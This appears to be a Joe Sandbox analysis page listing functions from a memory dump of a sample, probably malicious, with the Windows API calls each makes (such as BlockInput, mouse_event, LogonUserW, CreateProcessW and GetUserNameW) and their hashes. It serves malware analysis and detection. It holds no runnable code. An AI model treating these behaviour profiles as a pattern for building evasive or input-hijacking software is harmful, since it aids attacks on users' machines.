Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: ca9a941b37ddcac9132fab08d937cce183ffd19f62152f417b1495515e713494
Instruction ID: 44eb92a974ec04ae678a45c2a6fc85566987a502e803283e11ac4ed19b42c345
Opcode Fuzzy Hash: ca9a941b37ddcac9132fab08d937cce183ffd19f62152f417b1495515e713494
Instruction Fuzzy Hash: E622A1716083019FD724DF15C480B9BB7E4AF84314F14892EF89AA7291DB79ED45CB8A

Function 0043038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction ID: 69bf81b66c3c26f1d0dd6c17de0175bc626120c7630bd7c8ead8038a3ade81aa
Opcode Fuzzy Hash: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction Fuzzy Hash: 2AB1E220D2AF414DD72396398831336B75CAFBB2D5FA1D72BFC1A74D62EB2185934284

Function 0044B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0044B6DF

Part of subcall function 0042344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044BDC3,00000000,?,?,?,?,0044BF70,00000000,?), ref: 00423453
Part of subcall function 0042344A: __aulldiv.LIBCMT ref: 00423473

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction ID: 1f35ff8c92ab85e28a2e756204d048eea2d4dd3abb22b0d8cab743f592bf07ce
Opcode Fuzzy Hash: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction Fuzzy Hash: 9821A2766345108BD729CF38C881A92B7E1EB95311B248E7DE4E5CB2D0CB78B905DB98

Function 0047044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,00000112,?,?), ref: 004704F4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 382702308bbefd05b899b5f36d1960dc7fddb4143fbf07b59ecf72970e99f4d8
Instruction ID: 89b96d6aca7dcba29097b05108a8ec3598dc540f994cb1c9eb95e7674d6a3265
Opcode Fuzzy Hash: 382702308bbefd05b899b5f36d1960dc7fddb4143fbf07b59ecf72970e99f4d8
Instruction Fuzzy Hash: 3E110A71305215FAFB244A28CC05FFA3714D741B20F24C31BFB16592E2CA6D5D11935E

Function 004700AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

NtdllDialogWndProc_W.USER32(?,00000115,?,?,?,?,?,?,0047E467,?,?,?,?,00000000,?), ref: 00470127

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 3687f9a3782079dc741753beedffb4440ee5ef239ddc833813add54cd4bfe8ae
Instruction ID: d31b52881070957622572619936090dd1dd93659484c67fb8b46a60a55725b49
Opcode Fuzzy Hash: 3687f9a3782079dc741753beedffb4440ee5ef239ddc833813add54cd4bfe8ae
Instruction Fuzzy Hash: A901F531601114EBDB149F25DC09BFA3B92EB45324F44816BF94D17292C33AAC10D7A8

Function 0046E9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0041B526: GetWindowLongW.USER32(?,000000EB), ref: 0041B537

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0046E9F5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 6b6171b2715d73bb0f87374543921504def8234cde58a269fbb3f68fca048cc9
Instruction ID: d8a074511539ebf113e7bb70361c2223cd0f953f3ea457ba09191da8e975e736
Opcode Fuzzy Hash: 6b6171b2715d73bb0f87374543921504def8234cde58a269fbb3f68fca048cc9
Instruction Fuzzy Hash: A4F03C39200108FFCB559F95EC00CBA3BA6EB08364B04812AF9155B2A1D7369871EB99

Function 0046EC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

Part of subcall function 0041B63C: GetCursorPos.USER32(000000FF), ref: 0041B64F
Part of subcall function 0041B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000001), ref: 0041B691
Part of subcall function 0041B63C: GetAsyncKeyState.USER32(00000002), ref: 0041B69F

NtdllDialogWndProc_W.USER32(?,00000204,?,?,00000001,?,?,?,0047E514,?,?,?,?,?,00000001,?), ref: 0046ECCA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: b307ef7e75f4fd62d472582ddfcca868689b8022caef5873fb67e45381c1f139
Instruction ID: f6fcbcddf877c941f4eec12b489aaadea38ad68241e606dacf8c2c8a13ee2ec7
Opcode Fuzzy Hash: b307ef7e75f4fd62d472582ddfcca868689b8022caef5873fb67e45381c1f139
Instruction Fuzzy Hash: 3FF0A770200228ABDF145F06DC06EFE3B95EB01750F00401AF9051B2E2D77998B1DBD9

Function 0041AAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,00000006,?,?,?), ref: 0041AB45

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: c86ca61980c7b9d9ded4afd0cb292fdb4eeba7d43a6f54fe387dd24d538b88f0
Instruction ID: b8c3c4202e3efea8ccfbff49cd37ac47286ccb1aa58697c49c7abbcc05241d8e
Opcode Fuzzy Hash: c86ca61980c7b9d9ded4afd0cb292fdb4eeba7d43a6f54fe387dd24d538b88f0
Instruction Fuzzy Hash: 4AF0BE30600209AFDB188F05DC10E7A3BA2FB05360F00422AF9524B3B1D775D860DB58

Function 00456AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00456ACA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction ID: 4b42a4be7651b4fa624864156804a6211604a361ef3ec37b6f4db9037ef0e3f8
Opcode Fuzzy Hash: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction Fuzzy Hash: 5BE092352002046FD700EB99D40499AB7ECAFA4351B04842BF905D7291DAB4E8088B94

Function 004474E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0044750A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
Instruction ID: b1c6601c3e7c198507b9802ed8dd93b8fb3c162f29ab6dc9e599c823946f98a7
Opcode Fuzzy Hash: 60d1a7ff6e30d01b75608834012f6c66df7d7732c1d7c55b9425bf1f60535cfd
Instruction Fuzzy Hash: C6D09EA416C64579FC190B249D1BFB71608F300795FD4495B7603DD9C1AAEC6D07A03D

Function 0046F609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.USER32(?,00000232,?,?), ref: 0046F649

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 000eee718f62c470412458b829af2b8b43067aece7e0fd507d55133e7f80712c
Instruction ID: 8c5f4cce5823bc68a1fbcbb6b4bd08719be6acb1d67b811f263213b81269452c
Opcode Fuzzy Hash: 000eee718f62c470412458b829af2b8b43067aece7e0fd507d55133e7f80712c
Instruction Fuzzy Hash: 81F06D31601344BFDB21DF58DC05FC67B99EB16720F04401ABA11672F2CB756820DB69

Function 0041AB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,00000007,?,00000000,00000000,?,?), ref: 0041AB7D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e683eb362a4126131e2c63160be2a2f155afe1582d389cfaf0747909c1077648
Instruction ID: af86089a1935fe524e312c5a0fd3724bb281b0beb58c46132677aef283aa8bec
Opcode Fuzzy Hash: e683eb362a4126131e2c63160be2a2f155afe1582d389cfaf0747909c1077648
Instruction Fuzzy Hash: 86E08C34600208FBCB04AF91DC11E683B2AEB49314F10801DBA050A2A2CB36A462DB58

Function 0043B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0043AD3E), ref: 0043B124

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction ID: 9ead16adecf6f0b98c9b1c0a3e5b035ff8be85389ca5a659f0ab2e7831142da2
Opcode Fuzzy Hash: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction Fuzzy Hash: A8D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408510FA11D50A0C671D531AB50

Function 0046F654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.USER32(?,00000053,?,?,?,0047E4D1,?,?,?,?,?,?), ref: 0046F67F

Part of subcall function 0046E32E: _memset.LIBCMT ref: 0046E33D
Part of subcall function 0046E32E: _memset.LIBCMT ref: 0046E34C
Part of subcall function 0046E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3D00,004C3D44), ref: 0046E37B
Part of subcall function 0046E32E: CloseHandle.KERNEL32 ref: 0046E38D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: fbe513ec9cb6e69258fac7304ef1d3886222e243e353d1a61410655296cdfc0d
Instruction ID: cec2e6c9e0debbcbcc4788ccc50b19c9a4bcaed0c72fc2bbb33363e457783be0
Opcode Fuzzy Hash: fbe513ec9cb6e69258fac7304ef1d3886222e243e353d1a61410655296cdfc0d
Instruction Fuzzy Hash: 4CE04635200208EFCB01DF19EC05E8A37A5FB08314F01402AFA01072B2D731AC61EF5A

Function 0046F5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.USER32 ref: 0046F5FF

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 4c88c310aad80fa37af278e585329fc69dfc96f215ee135e677e9465aed8e2fe
Instruction ID: abe7935e1fabf811d2b2e1f2c593ed6d286008f71e37cf2d1359c1eaeb25ac2f
Opcode Fuzzy Hash: 4c88c310aad80fa37af278e585329fc69dfc96f215ee135e677e9465aed8e2fe
Instruction Fuzzy Hash: A9E0E234200208EFDB01DF84EC44E8A3BA5EB1A350F010064FD044B362C772A870EBA1

Function 0046F5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.USER32 ref: 0046F5D0

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 765d58d9838fe4326b9957ddff7a4c028cd285d9324a46983c524014b4ddbcb7
Instruction ID: 26f058523fe56451ea5f646fcf7b83809cbb323fa396688dde115fa55f86e39c
Opcode Fuzzy Hash: 765d58d9838fe4326b9957ddff7a4c028cd285d9324a46983c524014b4ddbcb7
Instruction Fuzzy Hash: 7BE0173420420CEFDB01DF84EC44E8A3BA5EB1A350F010064FD044B372C771A830DB61

Function 0041B715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

Part of subcall function 0041B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B72B), ref: 0041B7F6
Part of subcall function 0041B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B72B,00000000,?,?,0041B2EF,?,?), ref: 0041B88D

NtdllDialogWndProc_W.USER32(?,00000002,00000000,00000000,00000000,?,?,0041B2EF,?,?), ref: 0041B734

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: bc90b276ec9cd6aff904b050facd8a7e1d3d6806c7f1b7f1738e1d269a393e49
Instruction ID: 628a0e19a8d353a15eb3265ea9c8e2c2fd106b8c97cbdfcdd0156c8722ec46ce
Opcode Fuzzy Hash: bc90b276ec9cd6aff904b050facd8a7e1d3d6806c7f1b7f1738e1d269a393e49
Instruction Fuzzy Hash: 00D0123064430C77DB102B91DD07F993B1EDB50754F00842ABA14291E2CB79546055AC

Function 0047B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0047B352

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
Instruction ID: e7333226adad16c5055dfbbb590e28277ed762d8782b21bd7734f9a6573964fa
Opcode Fuzzy Hash: 196a95de5c9a0d0b07e1a1c9e201b9c33cbb7d2a0780617c91a43e3abc117b76
Instruction Fuzzy Hash: C6C04CB1801109DFCB51DFC0C9449EEB7BCAB08305F1040969105F2150D7749B459B7B

Function 00428189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042818F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction ID: d9a2277a5669354ba61d9b8df2fcfec71eca91813c8554d43367222680a44f9d
Opcode Fuzzy Hash: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction Fuzzy Hash: E4A0113000020CAB8F002B82EC088883F2CEA002A0B000030F80C000208B22A820AA8A

Function 004093F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

